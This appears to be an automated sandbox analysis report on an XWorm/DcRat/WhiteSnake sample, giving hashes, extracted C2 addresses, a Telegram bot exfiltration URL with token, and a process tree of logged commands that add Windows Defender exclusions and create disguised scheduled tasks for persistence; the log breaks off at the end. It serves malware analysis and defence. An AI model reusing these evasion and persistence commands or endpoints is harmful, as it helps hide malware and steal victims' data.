Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250207-en
  • resource tags
    arch:x64, arch:x86, image:win10ltsc2021-20250207-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    10-02-2025 16:55

General

  • Target

    XClient.exe

  • Size

    181KB

  • MD5

    cc753ab1d8daac56d1e705e62d632537

  • SHA1

    7950dc74519b207c3e24bbaa104df978a56872cb

  • SHA256

    1578626a3dcfb7b8f1b45b8a4ae7dddb8a185a9f8b5078bde4b094a93da14097

  • SHA512

    3dfc0e2d1ab6bf2dba387dc9fb1bb3cc1b61ff84ce0ace8569ad138121ef0a2abfdacfe4c96559b425bdda2b7c7ba7da7df0e618cc9f3a76a5ca4ca5179325f0

  • SSDEEP

    1536:LkZLPk11vanHyaRxXT2Ug+bNoZ8Avnn6emGOEPgHEJtP8TNUPhoHEq:wVf3g+bNMvnRmGOEN18TN8IEq

Malware Config

Extracted

Family

xworm

C2

93.80.32.255:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    system132.bind.exe

  • telegram

    https://api.telegram.org/bot7603136465:AAFpLP6n-3zudeL31J79Iemu9BCZkFG8shw/sendMessage?chat_id=5177525105

Extracted

Family

xworm

Version

3.0

C2

plus-loves.gl.at.ply.gg:59327

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7603136465:AAFpLP6n-3zudeL31J79Iemu9BCZkFG8shw/sendMessage?chat_id=5177525105

Signatures

  • DcRat

    DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.

  • Dcrat family
  • Detect Xworm Payload 4 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu, also known as WhiteSnake, is an information-stealing malware written in C#.

  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 3 IoCs
  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 40 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

  • Adds Run key to start application 2 TTPs 14 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules that act as plugins for Internet Explorer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim host in order to infer its geographical location.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

    schtasks is often used by malware for persistence or to execute payloads after infection.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    1⤵
    • Downloads MZ/PE file
    • Checks computer location settings
    • Drops startup file
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\system132.bind.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system132.bind.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:5084
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system132.bind" /tr "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4812
    • C:\Users\Admin\AppData\Local\Temp\82VA2HM1OE19KO6.exe
      "C:\Users\Admin\AppData\Local\Temp\82VA2HM1OE19KO6.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "82VA2HM1OE19KO6" /tr "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3216
    • C:\Users\Admin\AppData\Local\Temp\QNC8731GOQHJPKH.exe
      "C:\Users\Admin\AppData\Local\Temp\QNC8731GOQHJPKH.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2468
          • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
            "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
            5⤵
            • Modifies WinLogon for persistence
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4636
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vi4fp1vm\vi4fp1vm.cmdline"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3080
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFC7.tmp" "c:\Users\Admin\AppData\Roaming\CSC34E87D7A13ED4FE182C60C089477BE9.TMP"
                7⤵
                  PID:3376
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\msd5mc2m\msd5mc2m.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1952
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35.tmp" "c:\Users\Admin\AppData\Roaming\CSC198CCA46E0934C83B8ED48F26A282482.TMP"
                  7⤵
                    PID:2644
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0pwjgpt1\0pwjgpt1.cmdline"
                  6⤵
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:3176
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2.tmp" "c:\Windows\System32\CSCC96C9C2BDE2C408AB8ABA1A788B332BD.TMP"
                    7⤵
                      PID:64
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:3808
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4552
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:2272
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4784
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:1272
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:2128
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FRCGdajqoH.bat"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1588
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      7⤵
                        PID:1920
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        7⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:1080
                      • C:\Recovery\WindowsRE\RuntimeBroker.exe
                        "C:\Recovery\WindowsRE\RuntimeBroker.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1188
          • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
            "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping [base64 ping payload removed]
            1⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:3080
          • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
            "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
            1⤵
            • Executes dropped EXE
            PID:1080
          • C:\Users\Admin\AppData\Roaming\system132.bind.exe
            "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
            1⤵
            • Executes dropped EXE
            PID:4848
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:700
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdate" /sc ONLOGON /tr "'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2336
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1932
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4588
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3812
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3392
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:680
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4740
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3424
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:216
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdate" /sc ONLOGON /tr "'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:192
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2676
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3168
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1812
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1304
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 13 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1564
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3408
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 9 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2284
          • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
            "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
              "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
              2⤵
              • Executes dropped EXE
              PID:1952
            • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe
              "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe"
              2⤵
              • Executes dropped EXE
              PID:3596
          • C:\Users\Admin\AppData\Roaming\system132.bind.exe
            "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3156
            • C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe
              "C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe"
              2⤵
              • Executes dropped EXE
              PID:648
            • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
              "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
              2⤵
              • Executes dropped EXE
              PID:2856
          • C:\Windows\system32\AUDIODG.EXE
            C:\Windows\system32\AUDIODG.EXE 0x2ec 0x47c
            1⤵
              PID:4564
            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\MicrosoftEdge_X64_132.0.2957.140.exe
              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
              1⤵
              • Drops file in Program Files directory
              PID:3812
              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
                2⤵
                • Boot or Logon Autostart Execution: Active Setup
                • Executes dropped EXE
                • Installs/modifies Browser Helper Object
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies Internet Explorer settings
                • Modifies registry class
                • System policy modification
                PID:4808
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7593da818,0x7ff7593da824,0x7ff7593da830
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:1748
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
                  3⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  PID:3004
                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7593da818,0x7ff7593da824,0x7ff7593da830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:4032
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  PID:4068
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6ca86a818,0x7ff6ca86a824,0x7ff6ca86a830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:472
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:1820
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6ca86a818,0x7ff6ca86a824,0x7ff6ca86a830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:2468
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:2696
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6ca86a818,0x7ff6ca86a824,0x7ff6ca86a830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:4680
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness
              1⤵
                PID:1600
              • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
                "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:4672
                • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
                  "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:880
                • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe
                  "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:3336
              • C:\Users\Admin\AppData\Roaming\system132.bind.exe
                "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:3304
                • C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe
                  "C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1260
                • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
                  "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4704
              • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
